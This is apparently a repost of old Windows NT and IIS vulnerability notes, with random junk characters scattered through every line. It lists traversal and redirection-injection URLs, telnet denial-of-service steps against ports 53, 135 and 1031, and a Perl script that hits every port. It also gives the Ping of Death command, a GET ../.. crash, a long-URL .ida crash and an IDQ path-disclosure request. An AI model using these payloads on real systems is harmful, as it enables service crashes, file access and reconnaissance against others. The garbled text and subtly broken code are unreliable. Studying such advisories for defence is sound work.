受影響系統(tǒng):4.0,iis 1.0. R: V5 ?+ @6 S# A# F+ Y, j( G
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.3 t4 B, f* E- A9 B9 I& S9 e
# w: f' V, Z4 KA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
% K% y0 t9 A9 j; e! p3 @% G$ R6 Q; ~5 t3 U8 ]
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.+ W7 M& r1 h! ]+ O7 R' @
' x/ M2 ]! ~8 s) B
--------------------------------------------------------------------
- G8 a* |. N: U* ?" N$ W
4 J; _) v) Z& B$ w受影響系統(tǒng):4.0 O/ n4 D4 t* E$ k' w& [/ I* m
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.! V- O4 r5 _8 T
% z. W: V8 Q! n6 [& j4 R+ y/ xIf the file 'target.bat' exists, the file will be truncated.0 I2 E# B2 w- F
8 V( v- I/ Q2 g ^
5 @! J6 |3 ^$ xA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.! Z+ T. _8 u8 O+ o9 T K( g
; e8 M+ f' V( ], K7 b- w( e
----------------------------------------------------------------------6 @$ n X( ~6 G0 r/ i+ C: x8 J
) z0 ?5 d' \% C/ b& G/ N$ Q
受影響系統(tǒng):3.51,4.08 g( Y, n4 u* x+ U
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.' i- O5 J& `+ v: c1 A4 {
& d, j8 O8 Q( a4 F: _: u. |- q
The following steps;5 p, a( o7 `9 P9 w( j- Z
& V3 x* x4 w/ A$ @" a- kTelnet to an NT 4.0 system on port 135
- ]% L; S. o) E$ \, Z" Z ?Type about 10 characters followed by a <CR> - L5 l! E5 [5 g9 D3 Z: ^# l9 U
Exit Telnet
0 K1 t+ N! _1 R% W7 O0 e8 uresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.( r8 }% B6 d/ j0 o
; `# N! U* k5 k" K
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.' f3 i/ c" J0 G: k; l+ B
, [) E$ m' z3 K: _
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
- X4 G$ t8 J& [$ R; ?
3 N& h3 ~8 t" s* M2 s) Y0 J5 qIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
! X* R2 R4 v! q) Z
$ d1 t" t% J0 t& O7 m( p0 JThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
% n. X8 X2 R* i1 x' |
3 ?/ l, q( a, I/ Z8 T/*begin poke code*/
# C& ^. h8 }) Z% Q7 g5 `- Y2 o5 a+ G1 d" d5 l% t* J3 Y
use Socket;
) o( l; p6 N( u) Fuse FileHandle;+ @& ^0 z; ?# B% c
require "chat2.pl";% p4 H, G! ]# L
7 B. }, E; r* _' M
$systemname = $ARGV[0] && shift;* Y/ d6 F& d& E; y3 j8 ?
4 c! f+ k% F+ r/ a. y) [5 _* D$verbose = 1; # tell me what you're hitting
# b$ W& \( s ?. {7 {3 C$knownports = 1; # don't hit known problem ports1 A2 ~- R0 P( X
for ($port = $0; $port<65535; $port++) + R L5 y, p, I( P( j* u H
{) \5 b$ z. I& c* O J7 k- }" U
3 Q. h0 E& [: x5 k2 `
7 h7 w* p7 ?; N; @; Kif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
! g; F( G! M6 F' N$ y; r7 xnext;
$ ^! w y5 \3 M. u! Y9 K( z' K}
; p+ f% {9 C0 {, ?+ k9 v$fh = chat::open_port($systemname, $port);
; H% ?: }( ~# a1 t. G9 ~0 Schat::print ($fh,"This is about ten characters or more");1 T" e* ?, ]: p& H' p; m' r( w
if ($verbose) {* R3 [1 c( w+ h5 {+ n) g7 H
print "Trying port: $port\n";8 D2 |* G" k8 k8 E
}
3 L$ E, x. b2 s0 b% Lchat::close($fh);# r! P/ u& f# E# ^9 a
: B, c% K9 v3 h# [' w! s5 G3 \}
3 N' ?% W( d) q. ]( |. k* V9 n; I( t* g$ m p. r' d
7 Q! m/ t' T1 i$ g1 H
/*end poke code*/
3 |( t+ D7 s3 C3 ~2 Q
5 s; t" j% B* bSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername, W7 Z3 r, ~! n& y1 M& P% f
2 w1 k! J3 K4 |+ ]8 D }) y--------------------------------------------------------------------------------
! h" N8 O9 @; Q: {! [4 k/ ?
- ~- d" @& W! ~4 {- |& }受影響系統(tǒng):4.0) p' \# c P. O
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.* o6 j% N9 V( z; Z
3 \( J6 N5 w$ A' U! u% ^% XThis attack causes Dr. Watson to display an alert window and to log an error: $ B- \: E' S/ m" j
6 j. J9 d0 L, ~# z7 P"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
' W1 i6 f$ Q1 ~6 c% Y! q( t6 B
--------------------------------------------------------------------------------4 Y# m: Y* j, w, [' |/ U) X' `5 q. K4 @' _
. W& [/ r' @7 M" C& g
受影響系統(tǒng):3.51,4.02 C! t5 ~% X8 y+ h' Y' ^
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
0 P% {, f& X% S' y# j, ^0 [
4 l: O- D, o! A* y: U0 X Y$ @STOP: 0X0000001E
0 f: |0 I9 ~# a5 K+ a: FKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
2 n. z/ Q* C" ?( m6 ]4 Y' j1 k$ @/ A+ Y A
-OR-. |( ]- C' G( y+ ?( b
) u0 ^2 p$ j6 f% M' ~5 ZSTOP: 0x0000000A
# ?$ a7 b5 ]3 E. d$ bIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
3 u1 D( |( C0 [$ M) ~
! o7 @6 r. m( v9 ^) [NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
" X7 Q" B1 c) v; J+ c( ^0 I* v
, D; x* @" O4 `3 O! y* H--------------------------------------------------------------------------------
# s& {. [- T( v3 ]4 N& | b' ] r* ]7 b
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). ! K: S* S% f. x: z& C7 M" G
' f6 b: p6 U# }# H4 F--------------------------------------------------------! e% x6 N. W/ N
s5 t2 j/ z" t6 M4 C
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |